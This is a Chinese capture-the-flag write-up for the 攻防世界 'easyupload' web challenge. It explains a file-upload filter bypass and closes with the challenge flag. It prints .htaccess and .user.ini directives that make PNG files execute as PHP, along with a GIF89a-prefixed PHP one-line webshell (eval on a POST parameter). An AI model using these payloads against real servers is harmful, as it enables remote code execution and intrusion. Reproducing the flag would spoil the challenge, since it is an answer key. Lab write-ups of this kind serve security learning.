攻防世界-Web-easyupload

知识点

1.user.int绕过限制

步骤

1.直接抓包,先测是上传限制。(上传png等文件时记得加上GIF89a文件头)

php文件被禁止上传,尝试上传.htaccess文件,用来解析png文件中的php代码,结果发现.htaccess中的内容被限制了。如下内容:

复制代码
方法一:
<FilesMatch "4.png">
SetHandler application/x-httpd-php
</FilesMatch>
 
方法二:
AddType application/x-httpd-php .png

在此处需要使用.user.ini,这个文件的作用和.htaccess差不多,都是使一个文件能够被执行。

.user.ini文件内容:(使1.png能够被当做php执行)

复制代码
GIF89a
auto_prepend_file=1.png

然后再上传png文件,里面写上一句话木马,这里上传png文件时,不能包含php字样,所以采用另外一种一句话木马

1.png文件内容:(注意这里不要有空格不然会连接不上)

复制代码
GIF89a
<?=eval($_POST['cmd']);?>

2.连接

flag:cyberpeace{1b4d400f5bdf7e215a443886721a1fab}

相关推荐
0vvv07 小时前
md5值相同,但未计算md5的值不同的绕过
ctf
JTaoX7 小时前
Bugku-web(你从哪里来,MD5)
web·md5·writeup·bugku
CDN3609 小时前
CDN 缓存不生效 / 内容不更新?7 种原因 + 一键刷新方案
运维·网络安全·缓存
Chengbei1110 小时前
推送POC汇总 — 2026年3月多产品多类型vulnerability速递与应急建议
安全·web安全·网络安全·系统安全·网络攻击模型·安全架构
0vvv010 小时前
bugku-web-shell
ctf
菩提小狗10 小时前
每日安全情报报告 · 2026-03-29 · 2026-03-29
网络安全·漏洞·cve·安全情报·每日安全
程序员侠客行11 小时前
Tomcat 网络I/O模型浅析
java·tomcat·web
unable code12 小时前
BUUCTF-[第二章 web进阶]SSRF Training
网络安全·web·ctf·1024程序员节
yv_3012 小时前
CTF-IDA
学习·ctf